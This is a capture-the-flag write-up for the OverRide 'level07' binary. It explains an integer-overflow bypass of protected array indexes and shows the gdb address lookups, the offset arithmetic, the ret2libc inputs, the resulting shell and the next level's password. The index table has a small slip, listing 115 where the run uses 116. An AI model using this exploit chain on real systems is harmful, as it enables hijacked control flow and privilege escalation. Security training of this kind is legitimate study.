1. See dissasembly, we can understand 
	- the program creates a data table, where it stores 100 numbers at indexes
	- some indexes (index % 3 == 0) are protected
	- we can maxint overflow to access protected indexes
2. Find adress of system, exit, bin/sh
gdb -q level07
Reading symbols from /home/users/level07/level07...(no debugging symbols found)...done.
Undefined command: "gdb".  Try "help".
(gdb) b*main
Breakpoint 1 at 0x8048723
(gdb) run
Starting program: /home/users/level07/level07

Breakpoint 1, 0x08048723 in main ()
(gdb) p exit
$1 = {<text variable, no debug info>} 0xf7e5eb70 <exit>
(gdb) p system
$2 = {<text variable, no debug info>} 0xf7e6aed0 <system>
(gdb) find &system,+9999999,"/bin/sh"
0xf7f897ec
warning: Unable to access target memory at 0xf7fd3b74, halting search.
1 pattern found.
(gdb) x/s 0xf7f897ec
0xf7f897ec:      "/bin/sh"
3. Find overflow to access protected indexes
	We can we read by 4bytes and use quater uintmax for overflow 
	0x100000000 = 2^32
	[size of uintmax]
	Lets find the EIP save relative to the start of the buffer: 4 pushed registers (16) and esp, 
	0xfffffff0 (alignment to 16 bytes, removed 12 bytes) 
	size of stack: 0x1d0 (464) start of buffer: esp+0x24 (36)
	(464-36+16+12)/4 = 114
	(2^32 / 4) + 114 = 1073741938
                  [index 114, after overflow]

	1073741938 % 3 = 1
4. Create our script in decimal
  [ address of EIP ] = [ address of system ] [ address of exit ] [ address of "/bin/sh" ]
   0xffffd6bc           0xf7e6aed0           0xf7e5eb70             0xf7f897ec          # address
                        4159090384           4159040368             4160264172          # in decimal, to be number input
                            |                     |                     |
                        1073741938           115                    115                 # index to use
                        data[114]            data[115]              data[116]  
5. Use our script
	level07@OverRide:~$ ./level07
----------------------------------------------------
  Welcome to wil's crappy number storage service!
----------------------------------------------------
 Commands:
    store - store a number into the data storage
    read  - read a number from the data storage
    quit  - exit the program
----------------------------------------------------
   wil has reserved some storage :>
----------------------------------------------------

Input command: store
 Number: 4159090384
 Index: 1073741938
 Completed store command successfully
Input command: store
 Number: 4159040368
 Index: 115
 Completed store command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit
$ whoami
level08
$ cat /home/users/level08/.pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC